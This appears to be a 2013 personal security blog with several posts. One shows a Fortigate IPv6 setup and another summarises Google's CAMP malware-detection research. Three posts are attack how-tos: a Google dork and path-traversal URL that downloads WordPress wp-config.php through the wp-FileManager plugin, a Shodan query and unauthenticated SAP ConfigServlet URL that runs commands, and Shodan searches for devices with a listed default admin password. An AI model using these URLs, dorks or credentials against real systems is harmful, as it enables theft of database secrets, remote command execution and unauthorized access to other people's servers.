Friday, May 31, 2013

Last week I had to configure a Fortigate with IPv6. Also the firewall was needed to works as DHCPv6 Server.

Within two weeks, we will have around 200-300 network administrators in a conference room connected by WIFI. We want this users only get IPv6 addresses. So, if the network administrators haven't just implemented the IPv6 in their remote networks, they will not be able to connect to them. We want they to keep in mind the importance of IPv6 in the near future.

The next configuration is running on the v5.0.2 Fortigate firmware version. This version is only recommended for testing propourses. I recommend you the v4.3.10 firmware version. In this case we want to test the last firmware version in an "production environment" too.




How to configure the external Interface:

config system interface
    edit "wan1"
        set alias "External"
            config ipv6
                set ip6-address xxxx:xxx:xxx:113::2/64
                set ip6-allowaccess ping
                set ip6-manage-flag enable
                set ip6-other-flag enable
            end
    next



How to configure the static6 route:
 
config router static6
    edit 1
        set device "wan1"
        set gateway xxxx:xxx:xxx:113::1
    next
end


Posted on Friday, May 31, 2013 by Javier Nieto

No comments

Friday, May 17, 2013

ByEge has published a new weakness on wp-FileManager plugin. If you take advantage of this vulnerability, you could download for example the wp-config.php file where you can find out the database name, user name and password for the Wordpress site.

Google Dorks: inurl:wp-content/plugins/wp-filemanager/

Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download



Only  works if "Allow Download" setting is checked in the FileManager's settings on the server.

Original source here.

Posted on Friday, May 17, 2013 by Javier Nieto

No comments

Tuesday, April 30, 2013

Last week, Dmitry Chastuchin, Principal Researcher ERPScan published vulnerabilities on SAP.

SAP is the most popular business application. More than 180000 customers worldwide have it.

Companies like Nike, Coca-Cola, Sony working... with SAP systems

In this post, we are going to talk about how we can exploit this weaknesses.

First of all, we need to locate possibles SAP vulnerables servers. As usual, we are going to use Shodan.

http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000



Then, we are going to execute commands on the SAP server through our web browser using the nexts URL queries without authentication.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist

We can see the running processes on the server


Posted on Tuesday, April 30, 2013 by Javier Nieto

No comments

Thursday, April 18, 2013

Modern Malware is one of the new background businesses. Every day thousands of users’ machines are infected via so-called drive-by downloads or social engineering techniques. The simple act of visiting a website with a vulnerable browser may be enough for an attacker to gain control over the vulnerable computer allowing her to install arbitrary code.

CAMP was presented in February 2013 at the Network and Distributed System Security Symposium and was explained in a research paper

"CAMP consists of a client component built into Google Chrome and a server component responsible for maintaining a reputation system that predicts the likelihood that a downloaded binary is malicious"

After six-month deployment with more than 200 million Google Chrome users and approximately five million intentional malware downloads per month detected, Google Researchers say that they have developed an Antivirus able to detect the 99% of all malicious downloads in less than 130 ms on average using a reputation-based detection .


The current Security Systems Weakness

The document says the major Antivirus engines detect only 35% to 70% of modern malware. Antivirus are signature-based detection to identify variants of a known malware. Because of this, they cannot protect againts sophisticated techniques like packing, polymorphism and unknown malware. Additionally, some Antivirus has created a CloudAV. CloudAV upload the binaries files to a third-party cloud which implies loss privacy for the users.

Blacklist from Google’s Safe Browsing API , McAfee’s Site Advisor or Symantec’s Safe Web are useful when the compromised or malware distribution websites tend to be a long live but they are unuseful when the malware distribution frequently changing the domain.

Whitelist can be effective in an enterprise environment but they are very restrictive.


CAMP, a different approach

CAMP protects users from malware binaries without requiring (a-priori) knowledge of the binary augmenting whitelists and blacklists with a content-agnostic reputation system.

CAMP is composed of two parts: client (Google Chrome Web Browser) and Google Servers where client connect to download blacklist, whitelist and sends a request to CAMP's reputation service.

How the client works
  1. The browser tries to determine if a download came from a malicious site by checking the download URL against a list of URLs known as "malware distribution" using Google's SafeBrowsing API.
  2. The browser checks locally against a dynamically updated list of trusted domains and trusted binary signers to determine if the downloads are benign.
  3. The browser extracts content-agnostic features from the download and sends a request to CAMP's reputation service for downloads that don't match any of the local lists. 
  4. If a malicious download is requested and detected, Google Chrome warning the users giving her two options: Block or Pass the download.
The features sends to Google CAMP Server will be:
  • The URL and IP of the server hosting the download.
  • Any referrer URL and IP encountered when starting the download.
  • The size of the download and her hash.
  • The signature attached to the download including the signer and any certificate chain leading to it.
  • The browser will never send the binary itself reducing the privacy impact.

Posted on Thursday, April 18, 2013 by Javier Nieto

2 comments

Monday, April 15, 2013

Do you think that the personal from the IT department have default password in their equipments of a production environment? The answer is... YES!!!

In this post, we are going to discover these equipments with default credentials using ẃww.shodanhq.com

Shdoan is like "Google for Hackers". If you don't know; "SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners." 

Shodan is different than Google, Bing... Shodan indexes banners, so we can locate specific version of a specific software. For example, we can search servers running Apache 2.2.3 or a specific ProFTP server version with a known vulnerability.

These are popular Shodan searches examples.

Allot

Allot is a Bandwidth management solution.

http://www.shodanhq.com/search?q=jboss+6657&page=2

Default credentials
Admin: admin
Password: allot
 






Posted on Monday, April 15, 2013 by Javier Nieto

No comments